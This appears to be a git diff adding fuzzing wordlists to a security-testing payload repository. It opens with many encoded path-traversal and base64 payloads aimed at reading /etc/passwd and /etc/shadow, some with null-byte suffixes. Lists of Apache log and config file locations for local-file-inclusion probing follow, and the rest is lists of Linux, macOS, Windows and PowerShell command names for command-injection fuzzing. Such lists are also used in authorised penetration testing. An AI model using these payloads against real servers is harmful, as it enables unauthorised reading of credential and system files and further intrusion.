..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fshadow%00
|
||||
L2V0Yy9tYXN0ZXIucGFzc3dk
|
||||
L21hc3Rlci5wYXNzd2Q=
|
||||
ZXRjL3Bhc3N3ZA==
|
||||
ZXRjL3NoYWRvdyUwMA==
|
||||
L2V0Yy9wYXNzd2Q=
|
||||
L2V0Yy9wYXNzd2QlMDA=
|
||||
Li4vZXRjL3Bhc3N3ZA==
|
||||
Li4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3NoYWRvdyUwMA==
|
6
attack/lfi/common-ms-httpd-log-locations.txt
Normal file
6
attack/lfi/common-ms-httpd-log-locations.txt
Normal file
|
@ -0,0 +1,6 @@
|
|||
\Program Files\Apache Group\Apache\logs\access.log
|
||||
\Program Files\Apache Group\Apache\logs\error.log
|
||||
\Program Files\Apache Group\Apache\conf\httpd.conf
|
||||
\Program Files\Apache Group\Apache2\conf\httpd.conf
|
||||
\Program Files (x86)\Apache Group\Apache\logs\access.log
|
||||
\Program Files (x86)\Apache Group\Apache\logs\error.log
|
30
attack/lfi/common-unix-httpd-log-locations.txt
Normal file
30
attack/lfi/common-unix-httpd-log-locations.txt
Normal file
|
@ -0,0 +1,30 @@
|
|||
/apache/logs/error.log
|
||||
/apache/logs/access.log
|
||||
/apache/logs/error.log
|
||||
/apache/logs/access.log
|
||||
/apache/logs/error.log
|
||||
/apache/logs/access.log
|
||||
/etc/httpd/logs/acces_log
|
||||
/etc/httpd/logs/acces.log
|
||||
/etc/httpd/logs/error_log
|
||||
/etc/httpd/logs/error.log
|
||||
/var/www/logs/access_log
|
||||
/var/www/logs/access.log
|
||||
/usr/local/apache/logs/access_log
|
||||
/usr/local/apache/logs/access.log
|
||||
/var/log/apache/access_log
|
||||
/var/log/apache2/access_log
|
||||
/var/log/apache/access.log
|
||||
/var/log/apache2/access.log
|
||||
/var/log/access_log
|
||||
/var/log/access.log
|
||||
/var/www/logs/error_log
|
||||
/var/www/logs/error.log
|
||||
/usr/local/apache/logs/error_log
|
||||
/usr/local/apache/logs/error.log
|
||||
/var/log/apache/error_log
|
||||
/var/log/apache2/error_log
|
||||
/var/log/apache/error.log
|
||||
/var/log/apache2/error.log
|
||||
/var/log/error_log
|
||||
/var/log/error.log
|
571
attack/os-cmd-execution/Commands-Linux.txt
Normal file
571
attack/os-cmd-execution/Commands-Linux.txt
Normal file
|
@ -0,0 +1,571 @@
|
|||
accept
|
||||
access
|
||||
aclocal
|
||||
aconnect
|
||||
acpi
|
||||
acpi_available
|
||||
acpid
|
||||
addr2line
|
||||
addresses
|
||||
agetty
|
||||
alsactl
|
||||
amidi
|
||||
amixer
|
||||
anacron
|
||||
aplay
|
||||
aplaymidi
|
||||
apm
|
||||
apmd
|
||||
apropos
|
||||
apt
|
||||
ar
|
||||
arch
|
||||
arecord
|
||||
arecordmidi
|
||||
arp
|
||||
as
|
||||
at
|
||||
atd
|
||||
atq
|
||||
atrm
|
||||
audiosend
|
||||
aumix
|
||||
autoconf
|
||||
autoheader
|
||||
automake
|
||||
autoreconf
|
||||
autoscan
|
||||
autoupdate
|
||||
badblocks
|
||||
banner
|
||||
basename
|
||||
bash
|
||||
batch
|
||||
bc
|
||||
biff
|
||||
bison
|
||||
bzcmp
|
||||
bzdiff
|
||||
bzgrep
|
||||
bzip2
|
||||
bzless
|
||||
bzmore
|
||||
c++
|
||||
cal
|
||||
cardctl
|
||||
cardmgr
|
||||
cat
|
||||
cc
|
||||
cdda2wav
|
||||
cdparanoia
|
||||
cdrdao
|
||||
cdrecord
|
||||
cfdisk
|
||||
c++filt
|
||||
chage
|
||||
chattr
|
||||
chfn
|
||||
chgrp
|
||||
chkconfig
|
||||
chmod
|
||||
chown
|
||||
chpasswd
|
||||
chroot
|
||||
chrt
|
||||
chsh
|
||||
chvt
|
||||
cksum
|
||||
clear
|
||||
cmp
|
||||
col
|
||||
colcrt
|
||||
colrm
|
||||
column
|
||||
comm
|
||||
compress
|
||||
cp
|
||||
cpio
|
||||
cpp
|
||||
crond
|
||||
crontab
|
||||
csplit
|
||||
ctags
|
||||
cupsd
|
||||
cut
|
||||
cvs
|
||||
date
|
||||
dd
|
||||
deallocvt
|
||||
debugfs
|
||||
depmod
|
||||
devdump
|
||||
df
|
||||
diff
|
||||
diff3
|
||||
dig
|
||||
dir
|
||||
dircolors
|
||||
dirname
|
||||
disable
|
||||
dlpsh
|
||||
dmesg
|
||||
dnsdomainname
|
||||
dnssec-keygen
|
||||
dnssec-makekeyset
|
||||
dnssec-signkey
|
||||
dnssec-signzone
|
||||
doexec
|
||||
domainname
|
||||
dosfsck
|
||||
du
|
||||
dump
|
||||
dumpe2fs
|
||||
dumpkeys
|
||||
e2fsck
|
||||
e2image
|
||||
e2label
|
||||
echo
|
||||
edquota
|
||||
egrep
|
||||
eject
|
||||
elvtune
|
||||
emacs
|
||||
enable
|
||||
env
|
||||
envsubst
|
||||
esd
|
||||
esdcat
|
||||
esd-config
|
||||
esdctl
|
||||
esddsp
|
||||
esdmon
|
||||
esdplay
|
||||
esdrec
|
||||
esdsample
|
||||
etags
|
||||
ex
|
||||
expand
|
||||
expr
|
||||
factor
|
||||
false
|
||||
fc-cache
|
||||
fc-list
|
||||
fdformat
|
||||
fdisk
|
||||
fetchmail
|
||||
fgconsole
|
||||
fgrep
|
||||
file
|
||||
find
|
||||
finger
|
||||
fingerd
|
||||
flex
|
||||
fmt
|
||||
fold
|
||||
formail
|
||||
free
|
||||
fsck
|
||||
ftp
|
||||
ftpd
|
||||
fuser
|
||||
g++
|
||||
gawk
|
||||
gcc
|
||||
gdb
|
||||
getent
|
||||
getkeycodes
|
||||
gpasswd
|
||||
gpg
|
||||
gpgsplit
|
||||
gpgv
|
||||
gpm
|
||||
gprof
|
||||
grep
|
||||
groff
|
||||
groffer
|
||||
groupadd
|
||||
groupdel
|
||||
groupmod
|
||||
groups
|
||||
grpck
|
||||
grpconv
|
||||
gs
|
||||
gunzip
|
||||
gzexe
|
||||
gzip
|
||||
halt
|
||||
hdparm
|
||||
head
|
||||
hexdump
|
||||
host
|
||||
hostid
|
||||
hostname
|
||||
htdigest
|
||||
hwclock
|
||||
iconv
|
||||
id
|
||||
ifconfig
|
||||
imapd
|
||||
inetd
|
||||
info
|
||||
init
|
||||
insmod
|
||||
install
|
||||
ipcrm
|
||||
ipcs
|
||||
iptables
|
||||
iptables-restore
|
||||
iptables-save
|
||||
isodump
|
||||
isoinfo
|
||||
isosize
|
||||
isovfy
|
||||
ispell
|
||||
join
|
||||
kbd_mode
|
||||
kbdrate
|
||||
kernelversion
|
||||
kill
|
||||
killall
|
||||
killall5
|
||||
klogd
|
||||
kudzu
|
||||
last
|
||||
lastb
|
||||
lastlog
|
||||
ld
|
||||
ldconfig
|
||||
ldd
|
||||
less
|
||||
lesskey
|
||||
lftp
|
||||
lftpget
|
||||
link
|
||||
ln
|
||||
loadkeys
|
||||
locale
|
||||
locate
|
||||
lockfile
|
||||
logger
|
||||
login
|
||||
logname
|
||||
logrotate
|
||||
look
|
||||
losetup
|
||||
lpadmin
|
||||
lpinfo
|
||||
lpmove
|
||||
lpq
|
||||
lpr
|
||||
lprm
|
||||
lpstat
|
||||
ls
|
||||
lsattr
|
||||
lsmod
|
||||
lspci
|
||||
lsusb
|
||||
m4
|
||||
mail
|
||||
mailq
|
||||
mailstats
|
||||
mailto
|
||||
make
|
||||
makedbm
|
||||
makemap
|
||||
man
|
||||
manpath
|
||||
mattrib
|
||||
mbadblocks
|
||||
mcat
|
||||
mcd
|
||||
mcopy
|
||||
md5sum
|
||||
mdel, mdeltree
|
||||
mdir
|
||||
mdu
|
||||
merge
|
||||
mesg
|
||||
metamail
|
||||
metasend
|
||||
mformat
|
||||
mimencode
|
||||
minfo
|
||||
mkdir
|
||||
mkdosfs
|
||||
mke2fs
|
||||
mkfifo
|
||||
mkfs
|
||||
mkfs.ext3
|
||||
mkisofs
|
||||
mklost+found
|
||||
mkmanifest
|
||||
mknod
|
||||
mkraid
|
||||
mkswap
|
||||
mktemp
|
||||
mlabel
|
||||
mmd
|
||||
mmount
|
||||
mmove
|
||||
modinfo
|
||||
modprobe
|
||||
more
|
||||
mount
|
||||
mountd
|
||||
mpartition
|
||||
mpg123
|
||||
mpg321
|
||||
mrd
|
||||
mren
|
||||
mshowfat
|
||||
mt
|
||||
mtools
|
||||
mtoolstest
|
||||
mtype
|
||||
mv
|
||||
mzip
|
||||
named
|
||||
namei
|
||||
nameif
|
||||
netstat
|
||||
newaliases
|
||||
newgrp
|
||||
newusers
|
||||
nfsd
|
||||
nfsstat
|
||||
nice
|
||||
nm
|
||||
nohup
|
||||
nslookup
|
||||
nsupdate
|
||||
objcopy
|
||||
objdump
|
||||
od
|
||||
openvt
|
||||
passwd
|
||||
paste
|
||||
patch
|
||||
pathchk
|
||||
perl
|
||||
pidof
|
||||
ping
|
||||
pinky
|
||||
pmap
|
||||
portmap
|
||||
poweroff
|
||||
pppd
|
||||
pr
|
||||
praliases
|
||||
printenv
|
||||
printf
|
||||
ps
|
||||
ptx
|
||||
pwck
|
||||
pwconv
|
||||
pwd
|
||||
python
|
||||
quota
|
||||
quotacheck
|
||||
quotaoff
|
||||
quotaon
|
||||
quotastats
|
||||
raidstart
|
||||
ramsize
|
||||
ranlib
|
||||
rarpd
|
||||
rcp
|
||||
rdate
|
||||
rdev
|
||||
rdist
|
||||
rdistd
|
||||
readcd
|
||||
readelf
|
||||
readlink
|
||||
reboot
|
||||
reject
|
||||
rename
|
||||
renice
|
||||
repquota
|
||||
reset
|
||||
resize2fs
|
||||
restore
|
||||
rev
|
||||
rexec
|
||||
rexecd
|
||||
richtext
|
||||
rlogin
|
||||
rlogind
|
||||
rm
|
||||
rmail
|
||||
rmdir
|
||||
rmmod
|
||||
rndc
|
||||
rootflags
|
||||
route
|
||||
routed
|
||||
rpcgen
|
||||
rpcinfo
|
||||
rpm
|
||||
rsh
|
||||
rshd
|
||||
rsync
|
||||
runlevel
|
||||
rup
|
||||
ruptime
|
||||
rusers
|
||||
rusersd
|
||||
rwall
|
||||
rwho
|
||||
rwhod
|
||||
sane-find-scanner
|
||||
scanadf
|
||||
scanimage
|
||||
scp
|
||||
screen
|
||||
script
|
||||
sdiff
|
||||
sed
|
||||
sendmail
|
||||
sensors
|
||||
seq
|
||||
setfdprm
|
||||
setkeycodes
|
||||
setleds
|
||||
setmetamode
|
||||
setquota
|
||||
setsid
|
||||
setterm
|
||||
sftp
|
||||
sh
|
||||
sha1sum
|
||||
showkey
|
||||
showmount
|
||||
shred
|
||||
shutdown
|
||||
size
|
||||
skill
|
||||
slabtop
|
||||
slattach
|
||||
sleep
|
||||
slocate
|
||||
snice
|
||||
sort
|
||||
split
|
||||
ssh
|
||||
ssh-add
|
||||
ssh-agent
|
||||
sshd
|
||||
ssh-keygen
|
||||
ssh-keyscan
|
||||
stat
|
||||
statd
|
||||
strace
|
||||
strfile
|
||||
strings
|
||||
strip
|
||||
stty
|
||||
su
|
||||
sudo
|
||||
sum
|
||||
swapoff
|
||||
swapon
|
||||
sync
|
||||
sysctl
|
||||
sysklogd
|
||||
syslogd
|
||||
tac
|
||||
tail
|
||||
tailf
|
||||
talk
|
||||
talkd
|
||||
tar
|
||||
taskset
|
||||
tcpd
|
||||
tcpdump
|
||||
tcpslice
|
||||
tee
|
||||
telinit
|
||||
telnet
|
||||
telnetd
|
||||
test
|
||||
tftp
|
||||
tftpd
|
||||
time
|
||||
tload
|
||||
tmpwatch
|
||||
top
|
||||
touch
|
||||
tr
|
||||
tracepath
|
||||
traceroute
|
||||
troff
|
||||
true
|
||||
tset
|
||||
tsort
|
||||
tty
|
||||
tune2fs
|
||||
tunelp
|
||||
ul
|
||||
umount
|
||||
uname
|
||||
uncompress
|
||||
unexpand
|
||||
unicode_start
|
||||
unicode_stop
|
||||
uniq
|
||||
uptime
|
||||
useradd
|
||||
userdel
|
||||
usermod
|
||||
users
|
||||
usleep
|
||||
uudecode
|
||||
uuencode
|
||||
uuidgen
|
||||
vdir
|
||||
vi
|
||||
vidmode
|
||||
vim
|
||||
vmstat
|
||||
volname
|
||||
w
|
||||
wall
|
||||
warnquota
|
||||
watch
|
||||
wc
|
||||
wget
|
||||
whatis
|
||||
whereis
|
||||
which
|
||||
who
|
||||
whoami
|
||||
whois
|
||||
write
|
||||
xargs
|
||||
xinetd
|
||||
yacc
|
||||
yes
|
||||
ypbind
|
||||
ypcat
|
||||
ypinit
|
||||
ypmatch
|
||||
yppasswd
|
||||
yppasswdd
|
||||
yppoll
|
||||
yppush
|
||||
ypserv
|
||||
ypset
|
||||
yptest
|
||||
ypwhich
|
||||
ypxfr
|
||||
zcat
|
||||
zcmp
|
||||
zdiff
|
||||
zdump
|
||||
zforce
|
||||
zgrep
|
||||
zic
|
||||
zless
|
||||
zmore
|
||||
znew
|
||||
|
233
attack/os-cmd-execution/Commands-OSX.txt
Normal file
233
attack/os-cmd-execution/Commands-OSX.txt
Normal file
|
@ -0,0 +1,233 @@
|
|||
alias
|
||||
alloc
|
||||
apropos
|
||||
awk
|
||||
basename
|
||||
bash
|
||||
bg
|
||||
bind
|
||||
bless
|
||||
break
|
||||
builtin
|
||||
bzip
|
||||
cal
|
||||
caller
|
||||
case
|
||||
cat
|
||||
cd
|
||||
chflags
|
||||
chgrp
|
||||
chmod
|
||||
chown
|
||||
chroot
|
||||
cksum
|
||||
clear
|
||||
cmp
|
||||
comm
|
||||
command
|
||||
complete
|
||||
continue
|
||||
cp
|
||||
cron
|
||||
crontab
|
||||
curl
|
||||
cut
|
||||
date
|
||||
dc
|
||||
dd
|
||||
declare
|
||||
defaults
|
||||
df
|
||||
diff
|
||||
diff3
|
||||
dig
|
||||
dirname
|
||||
dirs
|
||||
diskutil
|
||||
disown
|
||||
ditto
|
||||
dot_clean
|
||||
drutil
|
||||
dscacheutil
|
||||
dscl
|
||||
du
|
||||
echo
|
||||
ed
|
||||
enable
|
||||
env
|
||||
eval
|
||||
exec
|
||||
exit
|
||||
expand
|
||||
expect
|
||||
export
|
||||
expr
|
||||
false
|
||||
fc
|
||||
fdisk
|
||||
fg
|
||||
file
|
||||
find
|
||||
fmt
|
||||
fold
|
||||
for
|
||||
fsck
|
||||
fsaclctl
|
||||
fs_usage
|
||||
ftp
|
||||
GetFileInfo
|
||||
getopt
|
||||
getopts
|
||||
goto
|
||||
grep
|
||||
groups
|
||||
gzip
|
||||
hash
|
||||
head
|
||||
hdiutil
|
||||
history
|
||||
hostname
|
||||
id
|
||||
if
|
||||
info
|
||||
install
|
||||
jobs
|
||||
join
|
||||
kextfind
|
||||
kickstart
|
||||
kill
|
||||
l
|
||||
last
|
||||
launchctl
|
||||
ll
|
||||
less
|
||||
let
|
||||
lipo
|
||||
ln
|
||||
local
|
||||
locate
|
||||
logname
|
||||
login
|
||||
logout
|
||||
lpr
|
||||
lprm
|
||||
lpstat
|
||||
ls
|
||||
lsregister
|
||||
lsbom
|
||||
lsof
|
||||
man
|
||||
mdfind
|
||||
mdutil
|
||||
mkdir
|
||||
mkfifo
|
||||
more
|
||||
mount
|
||||
mv
|
||||
net
|
||||
netstat
|
||||
networksetup
|
||||
nice
|
||||
nohup
|
||||
ntfs.util
|
||||
onintr
|
||||
open
|
||||
opensnoop
|
||||
osacompile
|
||||
osascript
|
||||
passwd
|
||||
paste
|
||||
pbcopy
|
||||
pbpaste
|
||||
pico
|
||||
ping
|
||||
pkgutil
|
||||
plutil
|
||||
pmset
|
||||
popd
|
||||
pr
|
||||
printenv
|
||||
printf
|
||||
ps
|
||||
pushd
|
||||
pwd
|
||||
quota
|
||||
rcp
|
||||
read
|
||||
readonly
|
||||
reboot
|
||||
return
|
||||
rev
|
||||
rm
|
||||
rmdir
|
||||
rpm
|
||||
rsync
|
||||
say
|
||||
screen
|
||||
screencapture
|
||||
sdiff
|
||||
security
|
||||
sed
|
||||
select
|
||||
set
|
||||
setfile
|
||||
shift
|
||||
shopt
|
||||
shutdown
|
||||
sips
|
||||
sleep
|
||||
softwareupdate
|
||||
sort
|
||||
source
|
||||
split
|
||||
stop
|
||||
su
|
||||
sudo
|
||||
sum
|
||||
suspend
|
||||
sw_vers
|
||||
system_profiler
|
||||
systemsetup
|
||||
tail
|
||||
tar
|
||||
tee
|
||||
test
|
||||
textutil
|
||||
time
|
||||
times
|
||||
top
|
||||
touch
|
||||
tr
|
||||
trap
|
||||
traceroute
|
||||
true
|
||||
tty
|
||||
type
|
||||
ufs.util
|
||||
ulimit
|
||||
umask
|
||||
umount
|
||||
unalias
|
||||
uname
|
||||
unexpand
|
||||
uniq
|
||||
units
|
||||
unset
|
||||
until
|
||||
users
|
||||
uuencode
|
||||
uudecode
|
||||
uuidgen
|
||||
uucp
|
||||
vi
|
||||
wait
|
||||
wc
|
||||
whatis
|
||||
where
|
||||
which
|
||||
while
|
||||
who
|
||||
whoami
|
||||
write
|
||||
xargs
|
||||
yes
|
158
attack/os-cmd-execution/Commands-Windows.txt
Normal file
158
attack/os-cmd-execution/Commands-Windows.txt
Normal file
|
@ -0,0 +1,158 @@
|
|||
a
|
||||
arp
|
||||
assoc
|
||||
at
|
||||
atmadm
|
||||
attrib
|
||||
bootcfg
|
||||
break
|
||||
cacls
|
||||
call
|
||||
change
|
||||
chcp
|
||||
chdir
|
||||
chkdsk
|
||||
chkntfs
|
||||
cipher
|
||||
cls
|
||||
cmd
|
||||
cmstp
|
||||
color
|
||||
comp
|
||||
compact
|
||||
convert
|
||||
copy
|
||||
cprofile
|
||||
cscript
|
||||
date
|
||||
defrag
|
||||
del
|
||||
dir
|
||||
diskcomp
|
||||
diskcopy
|
||||
diskpart
|
||||
doskey
|
||||
driverquery
|
||||
echo
|
||||
endlocal
|
||||
eventcreate
|
||||
eventquery
|
||||
eventtriggers
|
||||
evntcmd
|
||||
exit
|
||||
expand
|
||||
fc
|
||||
filter
|
||||
find
|
||||
findstr
|
||||
finger
|
||||
flattemp
|
||||
for
|
||||
format
|
||||
fsutil
|
||||
ftp
|
||||
ftype
|
||||
getmac
|
||||
goto
|
||||
gpresult
|
||||
gpupdate
|
||||
graftabl
|
||||
help
|
||||
helpctr
|
||||
hostname
|
||||
if
|
||||
ipconfig
|
||||
ipseccmd
|
||||
ipxroute
|
||||
irftp
|
||||
label
|
||||
lodctr
|
||||
logman
|
||||
lpq
|
||||
lpr
|
||||
macfile
|
||||
mkdir
|
||||
mmc
|
||||
mode
|
||||
more
|
||||
mountvol
|
||||
move
|
||||
msiexec
|
||||
msinfo32
|
||||
nbtstat
|
||||
net
|
||||
netsh
|
||||
netstat
|
||||
nslookup
|
||||
ntbackup
|
||||
ntcmdprompt
|
||||
ntsd
|
||||
openfiles
|
||||
pagefileconfig
|
||||
path
|
||||
pathping
|
||||
pause
|
||||
pbadmin
|
||||
pentnt
|
||||
perfmon
|
||||
ping
|
||||
popd
|
||||
print
|
||||
prncnfg
|
||||
prndrvr
|
||||
prnjobs
|
||||
prnmngr
|
||||
prnport
|
||||
prnqctl
|
||||
prompt
|
||||
pushd
|
||||
query
|
||||
rasdial
|
||||
rcp
|
||||
recover
|
||||
reg
|
||||
regsvr32
|
||||
relog
|
||||
rem
|
||||
rename
|
||||
replace
|
||||
rexec
|
||||
rmdir
|
||||
route
|
||||
rsh
|
||||
rsm
|
||||
runas
|
||||
sc
|
||||
schtasks
|
||||
secedit
|
||||
set
|
||||
setlocal
|
||||
shift
|
||||
shutdown
|
||||
sort
|
||||
start
|
||||
subst
|
||||
systeminfo
|
||||
sfc
|
||||
taskkill
|
||||
tasklist
|
||||
tcmsetup
|
||||
telnet
|
||||
tftp
|
||||
time
|
||||
title
|
||||
tracerpt
|
||||
tracert
|
||||
tree
|
||||
type
|
||||
typeperf
|
||||
unlodctr
|
||||
ver
|
||||
verify
|
||||
vol
|
||||
vssadmin
|
||||
w32tm
|
||||
winnt
|
||||
winnt32
|
||||
wmic
|
||||
xcopy
|
164
attack/os-cmd-execution/Commands-WindowsPowershell.txt
Normal file
164
attack/os-cmd-execution/Commands-WindowsPowershell.txt
Normal file
|
@ -0,0 +1,164 @@
|
|||
get-acl
|
||||
set-acl
|
||||
get-alias
|
||||
import-alias
|
||||
new-alias
|
||||
set-alias
|
||||
